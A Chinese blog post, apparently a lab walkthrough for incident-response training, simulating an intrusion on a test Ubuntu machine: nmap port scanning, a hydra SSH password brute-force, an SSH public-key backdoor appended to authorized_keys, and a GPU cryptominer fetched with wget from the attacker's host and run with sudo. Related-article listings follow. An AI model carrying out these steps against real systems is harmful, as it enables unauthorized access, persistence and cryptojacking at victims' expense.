渗透测试笔记——暴力破解、ssh公钥权限维持、GPU Wakuang程序(靶机系统:ubuntu)

已于 2023-04-20 11:02:57 修改
阅读量1.7k 收藏 8
点赞数 1
分类专栏: 应急响应 文章标签: ubuntu ssh linux 样本
于 2022-02-17 16:30:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40412037/article/details/122946491
版权

本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆

一、环境搭建

Ubuntu 20 系统 IP地址: 192.168.226.138

二、模拟攻击

2.1 扫描端口

拿到目标IP首先使用nmap扫描,探测一下开放的端口

nmap -sS 192.168.226.138

发现目标系统的22号端口开发
在这里插入图片描述

2.2 暴力破解root密码

使用 hydra 工具爆破 ssh 登录密码

hydra.exe -l zyr -P pass.txt ssh://192.168.226.138

在这里插入图片描述
使用爆破出的密码成功登录目标系统
在这里插入图片描述

2.3 权限维持—ssh公钥免密

首先使用 xshell 生成公钥,参考链接:https://blog.csdn.net/weixin_40412037/article/details/118305343
公钥密码:123qwe
在这里插入图片描述
之后将生成的公钥 id_rsa_2048.pub 传到目靶机上

wget http://192.168.226.1/id_rsa_2048.pub

在这里插入图片描述
靶机上开启免密登录功能

ssh-keygen -t rsa
#执行完命令,一直回车就行

在这里插入图片描述
开启 ssh 免密登录之后,执行命令ls - al查看发现多了一个 .ssh隐藏文件
在这里插入图片描述
将 xhell 的公钥id_rsa_2048.pub 移动到 .ssh目录下

cat id_rsa_2048.pub >> authorized_keys
cd .ssh

接下来将 xhell 的公钥 id_rsa_2048.pub 追加到 authorized_keys 文件(首次默认没有这个文件)

cat id_rsa_2048.pub >> authorized_keys

在这里插入图片描述
之后使用 xshell 验证ssh免密登录,成功登录
在这里插入图片描述
在这里插入图片描述

2.4 植入 gpu 挖矿程序

将挖矿恶意程序传到靶机
placi 文件截图
在这里插入图片描述

wget http://192.168.226.1/placi

在这里插入图片描述
之后,使用root权限运行 placi 文件即可

sudo ./placi

至此,模拟实战结束,成功留了ssh公钥后门、GPU挖矿程序

在这里插入图片描述

W小哥1
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Windows最强ssh客户端推荐,连接ubuntulinux神器 —— Bitvise SSH Client8.35.rar
04-16
windows服务器可以用我们电脑自带的远程连接来进行连接,但是linux服务器就需要下载一款软件来连接管理了。软件有很多,这里我推荐使用Bitvise SSH。不但可以远程管理,还可以图形界面上传文件。
一次真实的应急响应案例(Ubuntu)——暴力破解写入ssh公钥留hou门、植入GPU WK程序——事件复现(靶场下载地址)
03-02
靶场 对应 应急响应教程:https://blog.csdn.net/weixin_40412037/article/details/122963589?spm=1001.2014.3001.5502
golang-sshkey:SSH 公钥实用程序 - 存档
06-02
golang-sshkey 关于 SSH 密钥管理实用程序 安装 $ go get github.com/yosida95/golang-sshkey 文档 执照 golangis 在 3-Clause BSD 许可下获得许可。 见./许可证。
ssh-ldap-pubkey:实用程序,用于管理LDAP中存储的SSH公钥
05-12
OpenSSH / LDAP公钥 该项目提供了一个实用程序来管理存储在LDAP中的SSH公共密钥,还提供了一个脚本,供OpenSSH服务器从LDAP加载授权密钥。 为什么? 当您有许多服务器时,很难管理授权密钥。 您必须将所有公共密钥复制到要登录的每个服务器上的~/.ssh/authorized_keys中。 如果有一天您更改密钥怎么办? 使用某种集中式用户管理(通常是LDAP服务器)是一个好习惯。 那里有用户的登录名,uid,电子邮件,…和密码。 如果我们还可以将公共SSH密钥存储在LDAP服务器上怎么办? 使用此实用程序,它就像馅饼一样容易。 备择方案 如果您只需要一个轻量级实用程序供OpenSSH服务器从LDAP加载授权密钥,则可以使用用Lua编写的或用POSIX shell编写的(但它需要ldapsearch实用程序,在某些系统上可能无法正常工作) )。 要求 Python
OWASP1.2靶机百度云下载地址.txt
05-16
OWASP 1.2靶机百度云下载
web渗透测试----5、暴力破解漏洞--(1)SSH密码破解
七天
06-23 837
SSH暴力破解
一次真实的应急响应案例(Ubuntu)——暴力破解写入ssh公钥留后门、植入GPU挖矿程序——事件复现(含靶场环境)
W小哥
03-01 7314
一、SSH协议介绍 SSH(Secure Shell)是一套协议标准,可以用来实现两台机器之间的安全登录以及安全的数据传送,其保证数据安全的原理是非对称加密。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议,主要用于给远程登录会话数据进行加密,保证数据传输的安全。 危害: SSH口令长度太短或者复杂度不够,如仅包含数字,或仅包含字母等,容易被攻击者破解,一旦被攻击者获取,可用来直接登录系统,控制服务器所有权限。 一、事件背景 某天客户反馈:Linux服务器有异常连接,疑似被入侵。(真实案
渗透测试模拟实战——暴力破解写入ssh公钥留后门、植入GPU WK程序靶机系统ubuntu
02-18
渗透测试模拟实战——暴力破解写入ssh公钥留后门、植入GPU WK程序靶机系统ubuntu),真实有效,如有侵权,请联系csdn删除即可
内网渗透学习(三层网络拓扑)红日靶场
叶子的Blog
05-05 3172
环境搭建 配置虚拟机网卡 在Vmware中新增两个虚拟网卡VMnet8、VMnet14。VMnet8设为默认的NAT模式,IP段设为192.168.52.0/24;VMnet14设为仅主机模式,IP段设为192.168.93.0/24 环境信息 DMZ区的 Ubuntu 需要启动redis和nginx服务: sudo redis-server /etc/redis.conf sudo /usr/sbin/nginx -c /etc/nginx/nginx.conf sudo iptables -F
Linux使用ssh公钥实现免密码登录实例
01-11
linux下可以用用ssh-keygen生成公钥/私钥对,下面我以CentOS为例。 有机器A(192.168.1.155),B(192.168.1.181)。现想A通过ssh免密码登录到B。 首先以root账户登陆为例。 1.在A机下生成公钥/私钥对。 [root@A ~]# ...
ssh-keyscan命令 收集主机的ssh公钥
01-20
ssh-keyscan命令是一个收集大量主机公钥的实用工具。它的目的是创建和验证“ssh_known_hosts”文件。 ssh-keyscan命令仅支持ssh协议版本1,在ssh协议版本2无法使用。 语法格式: ssh-keyscan [参数] 常用参数: -...
阿里云效配置ssh公钥
12-16
阿里云效配置ssh公钥
Ubuntu系统设置公钥身份验证
06-01
设置公钥身份验证的步骤
搭建基于SSH公钥的Git服务器.docx
10-21
搭建基于SSH公钥访问的Git远程仓库。附加安全受限shell配置。
linux UbuntuSSH无密码验证配置的方法步骤
01-10
首先要确保你的linux系统中已经安装了ssh,对于ubuntu系统一般默认只安装了ssh client,所以还需要我们手动安装ssh server: sudo apt-get install openssh-server 二. SSH基本原理 2.1 基本原理 SSH之所以能够保证...
ssh-auto:将 ssh 公钥同时移动到多个用户帐户的小脚本
06-27
在多用户帐户系统中填充公共 ssh 密钥并设置适当的所有权/权限。 如果主机名/ips 已更改,也可以清除 known_hosts 文件。 预计这是由 root 用户运行的。 用法 将公钥添加到authorized_keys.sample并保存为...
易语言ECC公钥系统文件版加密
07-21
易语言ECC公钥系统文件版加密源码,ECC公钥系统文件版加密,程序启动的初始化工作,SHA256,私钥到WIF格式,公钥到压缩格式,公钥解压缩,WIF格式到私钥,某一位公钥_初始化数据,Base58编码,Base58解码,生成随机私钥,私钥到...
colab_ssh:创建SSH Tunel到正在运行的colab笔记
05-02
该软件包仅允许SSH公钥身份验证,因此您需要准备一次。 您可能已经在~/.ssh/id_rsa.pub拥有一个了。 如果您还没有一次,请参考创建一个新的 为了从您的计算机连接到SSH隧道,您将需要从安装cloudflared 用法 使用一...
ubuntu配置ssh公钥
最新发布
08-25
Ubuntu系统上配置SSH公钥需要以下步骤: 1. 首先,确保您已经安装了OpenSSH服务器。如果没有安装,可以通过以下命令进行安装: ``` sudo apt update sudo apt install openssh-server ``` 2. 生成SSH密钥对。您可以使用`ssh-keygen`命令生成密钥对。执行以下命令: ``` ssh-keygen -t rsa ``` 您将被提示选择密钥的存储位置和密码(可选)。按照提示操作即可。 3. 您的公钥默认存储在`~/.ssh/id_rsa.pub`文件中。您可以使用`cat`命令查看公钥内容: ``` cat ~/.ssh/id_rsa.pub ``` 4. 将公钥复制到目标主机。您需要将公钥内容复制到目标主机的`~/.ssh/authorized_keys`文件中。您可以使用`ssh-copy-id`命令来完成此操作。执行以下命令,将公钥复制到目标主机上的~/.ssh/authorized_keys文件中: ``` ssh-copy-id username@hostname ``` 其中,`username`是目标主机上的用户名,`hostname`是目标主机的IP地址或主机名。 5. 验证配置是否成功。现在,您应该能够使用SSH密钥登录目标主机而无需密码。执行以下命令尝试通过SSH连接到目标主机: ``` ssh username@hostname ``` 如果成功连接到目标主机,而无需输入密码,则表示您已成功配置SSH公钥。 请注意,这些步骤假设您已经在本地计算机上生成了密钥对,并且您具有目标主机上的正确访问权限

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值